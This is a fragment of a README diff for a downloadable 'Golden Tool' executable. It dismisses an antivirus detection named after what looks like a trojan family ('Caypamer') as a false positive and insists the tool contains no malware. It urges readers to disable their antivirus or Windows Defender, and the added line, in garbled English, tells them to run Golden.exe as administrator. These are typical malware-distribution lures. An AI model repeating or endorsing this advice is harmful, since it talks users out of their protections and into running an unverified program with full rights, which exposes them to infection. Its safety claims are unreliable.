Thedev200k/Thedev200k/README.md

 /Caypamer.ALM1."
 This occurs because the tool downloads files from the internet and may be flagged by some antivirus programs due to its nature of accessing external websites.

 Rest assured, this is a false positive.
 The Golden Tool is completely safe and does not contain any malware.
 If you receive a warning, please temporarily disable your antivirus or Windows Defender while using the tool, then re-enable it once you're done.

-Thank you for using the Golden Tool!
+But then frist to run Golden.exe has Adima Then run the tool Thank you for using the Golden Tool!